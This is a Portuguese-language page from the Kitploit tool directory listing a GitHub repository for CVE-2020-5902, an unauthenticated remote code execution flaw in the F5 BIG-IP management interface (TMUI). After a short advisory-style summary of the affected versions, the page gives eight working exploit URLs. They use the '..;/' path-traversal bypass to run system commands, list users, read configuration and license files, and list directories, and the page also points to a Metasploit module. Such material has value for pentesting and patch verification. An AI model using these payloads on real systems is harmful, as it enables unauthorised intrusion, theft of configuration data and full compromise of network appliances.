Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-5902 — [CVE-2020-5902] F5 BIG-IP Execução Remota de Código (RCE) | Kitploit
Ferramentas/GitHubGitHub/murataydemir/cve-2020-5902
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubmurataydemir/cve-2020-5902

CVE-2020-5902

[CVE-2020-5902] F5 BIG-IP Execução Remota de Código (RCE)

Ver Repositório
21há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

[CVE-2020-5902] Execução Remota de Código na Interface de Gerenciamento de Tráfego (TMUI) do F5 BIG-IP


Nas versões 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 e 11.6.1-11.6.5.1 do BIG-IP, a Interface de Gerenciamento de Tráfego (TMUI), também chamada de utilitário de Configuração, apresenta uma vulnerabilidade de Execução Remota de Código (RCE) em páginas não divulgadas.

Essa vulnerabilidade permite que atacantes não autenticados, ou usuários autenticados, com acesso de rede ao utilitário de Configuração, por meio da porta de gerenciamento do BIG-IP e/ou self IPs, executem comandos arbitrários do sistema, criem ou excluam arquivos, desativem serviços e/ou executem código Java arbitrário. Essa vulnerabilidade pode resultar em comprometimento total do sistema. O sistema BIG-IP no modo Appliance também é vulnerável. Esse problema não é exposto no plano de dados; apenas o plano de controle é afetado.

root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

O aviso de segurança original foi publicado pela F5 e você pode acessá-lo aqui
Além disso, há um módulo do Metasploit disponível para o CVE-2020-5902 com classificação Excelente. Você pode encontrar os códigos Ruby do módulo do Metasploit para exploits/linux/http/f5_bigip_tmui_rce.rb

Baixar ferramenta